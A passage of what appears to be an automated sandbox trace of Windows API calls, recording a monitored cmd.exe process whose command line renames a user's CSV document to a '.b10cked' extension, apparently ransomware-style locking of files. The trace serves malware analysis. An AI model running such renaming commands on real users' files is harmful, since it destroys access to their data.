hFile=0x4c, lpBuffer=0x1eedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eedd8*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.705] GetFileType (hFile=0x4c) returned 0x1 [0232.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.705] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eee28*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.705] GetFileType (hFile=0x4c) returned 0x1 [0232.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.705] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eee78*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.705] GetFileType (hFile=0x4c) returned 0x1 [0232.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.705] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeec8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eeec8*, lpNumberOfBytesWritten=0x1edecc*=0x20, lpOverlapped=0x0) returned 1 [0232.705] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.706] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1edeb8 | out: lpNewFilePointer=0x0) returned 1 [0232.706] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.706] ReadFile (in: hFile=0x54, lpBuffer=0x1eece8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1eded8, lpOverlapped=0x0 | out: lpBuffer=0x1eece8*, lpNumberOfBytesRead=0x1eded8*=0x200, lpOverlapped=0x0) returned 1 [0232.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.706] GetFileType (hFile=0x4c) returned 0x1 [0232.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.706] GetFileType (hFile=0x4c) returned 0x1 [0232.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.706] WriteFile (in: hFile=0x4c, lpBuffer=0x1eece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eece8*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.706] GetFileType (hFile=0x4c) returned 0x1 [0232.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.706] WriteFile (in: hFile=0x4c, lpBuffer=0x1eed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eed38*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.706] GetFileType (hFile=0x4c) returned 0x1 [0232.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.706] WriteFile (in: hFile=0x4c, lpBuffer=0x1eed88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eed88*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.706] GetFileType (hFile=0x4c) returned 0x1 [0232.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.706] WriteFile (in: hFile=0x4c, lpBuffer=0x1eedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eedd8*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.706] GetFileType (hFile=0x4c) returned 0x1 [0232.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.706] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eee28*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.707] GetFileType (hFile=0x4c) returned 0x1 [0232.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.707] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eee78*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.707] GetFileType (hFile=0x4c) returned 0x1 [0232.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.707] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeec8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eeec8*, lpNumberOfBytesWritten=0x1edecc*=0x20, lpOverlapped=0x0) returned 1 [0232.707] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.707] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1edeb8 | out: lpNewFilePointer=0x0) returned 1 [0232.707] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.707] ReadFile (in: hFile=0x54, lpBuffer=0x1eece8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1eded8, lpOverlapped=0x0 | out: lpBuffer=0x1eece8*, lpNumberOfBytesRead=0x1eded8*=0x200, lpOverlapped=0x0) returned 1 [0232.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.707] GetFileType (hFile=0x4c) returned 0x1 [0232.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.707] GetFileType (hFile=0x4c) returned 0x1 [0232.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.707] WriteFile (in: hFile=0x4c, lpBuffer=0x1eece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eece8*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.707] GetFileType (hFile=0x4c) returned 0x1 [0232.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.707] WriteFile (in: hFile=0x4c, lpBuffer=0x1eed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eed38*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.708] GetFileType (hFile=0x4c) returned 0x1 [0232.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.708] WriteFile (in: hFile=0x4c, lpBuffer=0x1eed88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eed88*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.708] GetFileType (hFile=0x4c) returned 0x1 [0232.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.708] WriteFile (in: hFile=0x4c, lpBuffer=0x1eedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eedd8*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.708] GetFileType (hFile=0x4c) returned 0x1 [0232.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.708] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eee28*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.708] GetFileType (hFile=0x4c) returned 0x1 [0232.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.708] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eee78*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.708] GetFileType (hFile=0x4c) returned 0x1 [0232.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.708] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeec8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eeec8*, lpNumberOfBytesWritten=0x1edecc*=0x20, lpOverlapped=0x0) returned 1 [0232.708] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.708] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1edeb8 | out: lpNewFilePointer=0x0) returned 1 [0232.708] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.708] ReadFile (in: hFile=0x54, lpBuffer=0x1eece8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1eded8, lpOverlapped=0x0 | out: lpBuffer=0x1eece8*, lpNumberOfBytesRead=0x1eded8*=0x200, lpOverlapped=0x0) returned 1 [0232.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.709] GetFileType (hFile=0x4c) returned 0x1 [0232.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.709] GetFileType (hFile=0x4c) returned 0x1 [0232.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.709] WriteFile (in: hFile=0x4c, lpBuffer=0x1eece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eece8*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.709] GetFileType (hFile=0x4c) returned 0x1 [0232.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.709] WriteFile (in: hFile=0x4c, lpBuffer=0x1eed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eed38*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.709] GetFileType (hFile=0x4c) returned 0x1 [0232.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.709] WriteFile (in: hFile=0x4c, lpBuffer=0x1eed88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eed88*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.709] GetFileType (hFile=0x4c) returned 0x1 [0232.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.709] WriteFile (in: hFile=0x4c, lpBuffer=0x1eedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eedd8*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.709] GetFileType (hFile=0x4c) returned 0x1 [0232.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.709] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eee28*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.709] GetFileType (hFile=0x4c) returned 0x1 [0232.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.709] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eee78*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.710] GetFileType (hFile=0x4c) returned 0x1 [0232.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.710] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeec8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eeec8*, lpNumberOfBytesWritten=0x1edecc*=0x20, lpOverlapped=0x0) returned 1 [0232.710] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.710] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1edeb8 | out: lpNewFilePointer=0x0) returned 1 [0232.710] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.710] ReadFile (in: hFile=0x54, lpBuffer=0x1eece8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1eded8, lpOverlapped=0x0 | out: lpBuffer=0x1eece8*, lpNumberOfBytesRead=0x1eded8*=0x200, lpOverlapped=0x0) returned 1 [0232.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.710] GetFileType (hFile=0x4c) returned 0x1 [0232.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.710] GetFileType (hFile=0x4c) returned 0x1 [0232.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.710] WriteFile (in: hFile=0x4c, lpBuffer=0x1eece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eece8*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.710] GetFileType (hFile=0x4c) returned 0x1 [0232.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.710] WriteFile (in: hFile=0x4c, lpBuffer=0x1eed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eed38*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.710] GetFileType (hFile=0x4c) returned 0x1 [0232.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.710] WriteFile (in: hFile=0x4c, lpBuffer=0x1eed88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eed88*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.710] GetFileType (hFile=0x4c) returned 0x1 [0232.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.711] WriteFile (in: hFile=0x4c, lpBuffer=0x1eedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eedd8*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.711] GetFileType (hFile=0x4c) returned 0x1 [0232.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.711] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eee28*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.711] GetFileType (hFile=0x4c) returned 0x1 [0232.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.711] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eee78*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.711] GetFileType (hFile=0x4c) returned 0x1 [0232.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.711] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeec8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eeec8*, lpNumberOfBytesWritten=0x1edecc*=0x20, lpOverlapped=0x0) returned 1 [0232.711] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.711] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1edeb8 | out: lpNewFilePointer=0x0) returned 1 [0232.711] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.711] ReadFile (in: hFile=0x54, lpBuffer=0x1eece8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1eded8, lpOverlapped=0x0 | out: lpBuffer=0x1eece8*, lpNumberOfBytesRead=0x1eded8*=0x32, lpOverlapped=0x0) returned 1 [0232.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.711] GetFileType (hFile=0x4c) returned 0x1 [0232.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.711] GetFileType (hFile=0x4c) returned 0x1 [0232.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.711] WriteFile (in: hFile=0x4c, lpBuffer=0x1eece8*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eece8*, lpNumberOfBytesWritten=0x1edecc*=0x32, lpOverlapped=0x0) returned 1 [0232.711] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.712] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1edeb8 | out: lpNewFilePointer=0x0) returned 1 [0232.712] _close (_FileHandle=4) returned 0 [0232.712] FindNextFileW (in: hFindFile=0x250e50, lpFindFileData=0x1eef4c | out: lpFindFileData=0x1eef4c) returned 0 [0232.712] GetLastError () returned 0x12 [0232.712] FindClose (in: hFindFile=0x250e50 | out: hFindFile=0x250e50) returned 1 [0232.713] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0232.713] _close (_FileHandle=3) returned 0 [0232.713] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.714] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0232.714] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.714] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0232.714] _get_osfhandle (_FileHandle=0) returned 0x3 [0232.714] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0232.714] SetConsoleInputExeNameW () returned 0x1 [0232.714] GetConsoleOutputCP () returned 0x1b5 [0232.714] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0232.714] SetThreadUILanguage (LangId=0x0) returned 0x409 [0232.715] exit (_Code=0) Process: id = "617" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b40" os_pid = "0x9e0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\GOL7OX~1.CSV\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\g ol7OxwE18leXod.csv.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 34445 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 34446 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 34447 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 34448 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 34449 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 34450 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 34451 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 34452 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 34453 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 34454 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 34783 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 34784 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 34785 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 34786 start_va = 0x4b0000 end_va = 0x5affff entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 34787 start_va = 0x790000 end_va = 0x79ffff entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 34788 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 34789 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 34790 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 34791 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 34792 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 34793 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 34794 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 34795 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 34796 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 34797 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 34798 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 34799 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 34800 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 34801 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 34802 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 34803 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 34804 start_va = 0x2d0000 end_va = 0x3d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 34805 start_va = 0x5b0000 end_va = 0x712fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 34806 start_va = 0x7a0000 end_va = 0x139ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007a0000" filename = "" Thread: id = 857 os_tid = 0x938 [0232.498] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cff04 | out: lpSystemTimeAsFileTime=0x2cff04*(dwLowDateTime=0xbe235400, dwHighDateTime=0x1d440a9)) [0232.498] GetCurrentProcessId () returned 0x9e0 [0232.498] GetCurrentThreadId () returned 0x938 [0232.498] GetTickCount () returned 0x3ff54 [0232.498] QueryPerformanceCounter (in: lpPerformanceCount=0x2cfefc | out: lpPerformanceCount=0x2cfefc*=28928741969) returned 1 [0232.499] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0232.499] __set_app_type (_Type=0x1) [0232.499] __p__fmode () returned 0x76b331f4 [0232.499] __p__commode () returned 0x76b331fc [0232.499] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0232.499] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0232.500] GetCurrentThreadId () returned 0x938 [0232.500] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x938) returned 0x38 [0232.500] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0232.500] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0232.500] SetThreadUILanguage (LangId=0x0) returned 0x409 [0232.500] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0232.500] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cfe94 | out: 